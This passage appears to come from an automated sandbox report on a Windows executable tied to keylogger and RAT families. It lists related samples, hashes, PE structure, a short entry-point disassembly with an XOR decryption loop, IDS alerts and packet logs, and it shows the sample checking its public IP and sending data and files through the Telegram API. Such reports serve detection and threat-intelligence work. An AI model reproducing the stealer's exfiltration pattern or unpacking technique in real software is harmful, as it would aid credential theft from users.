                                                                                                                    193.122.130.0b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    tVuAoupHhZ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    s-part-0017.t-0009.t-msedge.net4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    Yv24LkKBY6.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    11626244731900027402.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    QQpQgSYkjW.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    1r3DRyrX0T.exeGet hashmaliciousDarkWatchmanBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    TBUjHBNHaD.exeGet hashmaliciousDarkWatchmanBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    S7s4XhcN1G.exeGet hashmaliciousDarkWatchmanBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    6043249381237528594.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    247624346306918832.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    reallyfreegeoip.orgJWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.80.1
                                                                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.80.1
                                                                                                                    b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.80.1
                                                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.16.1
                                                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.96.1
                                                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.32.1
                                                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.64.1
                                                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 104.21.32.1
                                                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 104.21.64.1
                                                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.16.1
                                                                                                                    api.telegram.orgJWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    TELEGRAMRUJWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ORACLE-BMC-31898USb6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 193.122.130.0
                                                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 193.122.130.0
                                                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 158.101.44.242
                                                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 158.101.44.242
                                                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 158.101.44.242
                                                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 158.101.44.242
                                                                                                                    prgNb8YFEA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    CLOUDFLARENETUSlrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                                                                    • 104.20.4.235
                                                                                                                    Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.48.1
                                                                                                                    rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 104.21.88.139
                                                                                                                    JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.80.1
                                                                                                                    xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 104.21.80.1
                                                                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.80.1
                                                                                                                    b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.80.1
                                                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.16.1
                                                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.96.1
                                                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.32.1
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adJWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.112.1
                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0elrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    No context
                                                                                                                    No created / dropped files found
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):6.6923883083010205
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:x8M2g1Xxhz.exe
                                                                                                                    File size:2'841'088 bytes
                                                                                                                    MD5:6776d32ed5b26c788e25c1632b555d47
                                                                                                                    SHA1:ca579bfb0a3a85fd0c234385d1fc5873a19d11a4
                                                                                                                    SHA256:8d5ad043ae91a80f57574f52b78402a7497b7377a29ebd2401c1f42ef0c41617
                                                                                                                    SHA512:aecb65a4d5d6d645910ce651a3277d97f4a51b145b0edfd1d1c495d6a915acb18a654b6fa81c7d7d57d7ebcb5215286c3df9802f682695f9c06e8ff52e92df12
                                                                                                                    SSDEEP:49152:oKQK2r0YVjKDyOSRTzsTSKC7o5lq/Ucqw:nZ2IYVjKDyOSJzJKCse/E
                                                                                                                    TLSH:76D52995A40676CFD4CE27B49527CD89685E0BFD872009C3AC69B4BAFE63CC115F6C28
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~...................f....PE..L...t..P..........#........
                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                    Entrypoint:0x6b7000
                                                                                                                    Entrypoint Section:dqypilex
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:baa93d47220682c04d92f7797d9224ce
                                                                                                                    Instruction
                                                                                                                    push esi
                                                                                                                    push eax
                                                                                                                    push ebx
                                                                                                                    call 00007FC218B03406h
                                                                                                                    int3
                                                                                                                    pop eax
                                                                                                                    mov ebx, eax
                                                                                                                    inc eax
                                                                                                                    sub eax, 0027F000h
                                                                                                                    sub eax, 100C1744h
                                                                                                                    add eax, 100C173Bh
                                                                                                                    cmp byte ptr [ebx], FFFFFFCCh
                                                                                                                    jne 00007FC218B0341Bh
                                                                                                                    mov byte ptr [ebx], 00000000h
                                                                                                                    mov ebx, 00001000h
                                                                                                                    push 3234C100h
                                                                                                                    push 6F303CD7h
                                                                                                                    push ebx
                                                                                                                    push eax
                                                                                                                    call 00007FC218B0340Fh
                                                                                                                    add eax, 14h
                                                                                                                    mov dword ptr [esp+08h], eax
                                                                                                                    pop ebx
                                                                                                                    pop eax
                                                                                                                    ret
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push eax
                                                                                                                    push ebx
                                                                                                                    push ecx
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [ebp+08h]
                                                                                                                    mov ecx, dword ptr [ebp+0Ch]
                                                                                                                    shr ecx, 02h
                                                                                                                    mov eax, dword ptr [ebp+10h]
                                                                                                                    mov ebx, dword ptr [ebp+14h]
                                                                                                                    test ecx, ecx
                                                                                                                    je 00007FC218B0340Ch
                                                                                                                    xor dword ptr [esi], eax
                                                                                                                    add dword ptr [esi], ebx
                                                                                                                    add esi, 04h
                                                                                                                    dec ecx
                                                                                                                    jmp 00007FC218B033F4h
                                                                                                                    pop esi
                                                                                                                    pop ecx
                                                                                                                    pop ebx
                                                                                                                    pop eax
                                                                                                                    leave
                                                                                                                    retn 0010h
                                                                                                                    push es
                                                                                                                    adc byte ptr [edx+273821B5h], FFFFFF8Bh
                                                                                                                    push edi
                                                                                                                    movsb
                                                                                                                    stc
                                                                                                                    jnle 00007FC218B03382h
                                                                                                                    lahf
                                                                                                                    and al, dl
                                                                                                                    and al, D1h
                                                                                                                    fidiv dword ptr [esi-24h]
                                                                                                                    into
                                                                                                                    cmp edi, ecx
                                                                                                                    call 00007FC1DBF774B6h
                                                                                                                    and al, 10h
                                                                                                                    hlt
                                                                                                                    leave
                                                                                                                    mov eax, dword ptr [1A676B08h]
                                                                                                                    inc ebp
                                                                                                                    adc bh, byte ptr [edx]
                                                                                                                    xchg dword ptr [edi+edx-448D94A6h], ebp
                                                                                                                    jnl 00007FC218B03402h
                                                                                                                    movsd
                                                                                                                    arpl word ptr [edi-77h], dx
                                                                                                                    sub al, 24h
                                                                                                                    mov ebp, 17A02185h
                                                                                                                    xor ebx, ebp
                                                                                                                    pop ebp
                                                                                                                    push ebx
                                                                                                                    sub dword ptr [esp], 577930EAh
                                                                                                                    mov edx, dword ptr [esp]
                                                                                                                    add esp, 04h
                                                                                                                    add edx, 577930EAh
                                                                                                                    sub ebx, esi
                                                                                                                    Programming Language:
                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                    • [LNK] VS2008 build 21022
                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3706d0x95.idata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x10dc8.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    0x10000x250000x2500039a55dc4e32921666bbf5847679ea044False0.6185269742398649data7.0329103548795775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0x260000x10dc80x10e0005d9a7b35903dc76c6403500cdc62098False0.9666811342592593data7.969706621536402IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .idata 0x370000x10000x200dcad19575a3190349e945eeeebe2d7b4False0.17578125data1.2793598462581839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    tzvdltub0x380000x27f0000x27e80096f716b33551dc7fbb3d06f404bc9119unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    dqypilex0x2b70000x10000x200e2394b654a38de8df0bab7c5d2c58b68False0.55078125data4.311529115138432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_RCDATA0x261240xfd0adata1.0004013708357775
                                                                                                                    RT_RCDATA0x35e300x20data1.28125
                                                                                                                    RT_VERSION0x35e500x31cdata0.4296482412060301
                                                                                                                    RT_MANIFEST0x3616c0xc5bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3926651912741069
                                                                                                                    DLLImport
                                                                                                                    kernel32.dlllstrcpy
                                                                                                                    comctl32.dllInitCommonControls
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2025-01-11T08:08:31.701907+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949747193.122.130.080TCP
                                                                                                                    2025-01-11T08:08:32.842548+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949747193.122.130.080TCP
                                                                                                                    2025-01-11T08:08:33.448383+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949759104.21.112.1443TCP
                                                                                                                    2025-01-11T08:08:34.093331+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949761193.122.130.080TCP
                                                                                                                    2025-01-11T08:08:36.861925+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949784104.21.112.1443TCP
                                                                                                                    2025-01-11T08:08:37.928318+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949792104.21.112.1443TCP
                                                                                                                    2025-01-11T08:08:38.983490+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949802104.21.112.1443TCP
                                                                                                                    2025-01-11T08:08:40.057813+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949809104.21.112.1443TCP
                                                                                                                    2025-01-11T08:08:42.078227+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.949824149.154.167.220443TCP
                                                                                                                    2025-01-11T08:08:49.297232+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949874149.154.167.220443TCP
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 11, 2025 08:08:31.082309008 CET4974780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:31.088671923 CET8049747193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:31.088756084 CET4974780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:31.089056969 CET4974780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:31.095088959 CET8049747193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:31.552875996 CET8049747193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:31.557692051 CET4974780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:31.562515020 CET8049747193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:31.658701897 CET8049747193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:31.701906919 CET4974780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:32.031064034 CET49753443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.031083107 CET44349753104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.031254053 CET49753443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.044920921 CET49753443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.044933081 CET44349753104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.511049032 CET44349753104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.511173010 CET49753443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.519334078 CET49753443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.519354105 CET44349753104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.519737005 CET44349753104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.561309099 CET49753443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.568547964 CET49753443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.611346006 CET44349753104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.679742098 CET44349753104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.679807901 CET44349753104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.680114031 CET49753443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.686340094 CET49753443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.697225094 CET4974780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:32.702152014 CET8049747193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.799482107 CET8049747193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.801708937 CET49759443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.801762104 CET44349759104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.801845074 CET49759443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.802156925 CET49759443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:32.802171946 CET44349759104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:32.842547894 CET4974780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:33.296250105 CET44349759104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:33.298928022 CET49759443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:33.298959017 CET44349759104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:33.448422909 CET44349759104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:33.448488951 CET44349759104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:33.448545933 CET49759443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:33.449143887 CET49759443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:33.631829023 CET4974780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:33.632863045 CET4976180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:33.636806965 CET8049747193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:33.636847973 CET4974780192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:33.637603045 CET8049761193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:33.637655020 CET4976180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:33.637767076 CET4976180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:33.642533064 CET8049761193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.093103886 CET8049761193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.093331099 CET4976180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:34.094400883 CET49766443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:34.094450951 CET44349766104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.094537020 CET49766443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:34.094780922 CET49766443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:34.094796896 CET44349766104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.098340988 CET8049761193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.098400116 CET4976180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:34.557732105 CET44349766104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.559545040 CET49766443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:34.559582949 CET44349766104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.687334061 CET44349766104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.687593937 CET44349766104.21.112.1192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.687691927 CET49766443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:34.687967062 CET49766443192.168.2.9104.21.112.1
                                                                                                                    Jan 11, 2025 08:08:34.692825079 CET4977180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:34.697715044 CET8049771193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:34.697818041 CET4977180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:34.697932959 CET4977180192.168.2.9193.122.130.0
                                                                                                                    Jan 11, 2025 08:08:34.702676058 CET8049771193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.180303097 CET8049771193.122.130.0192.168.2.9
                                                                                                                    Jan 11, 2025 08:08:35.181596994 CET49776443192.168.2.9104.21.112.1
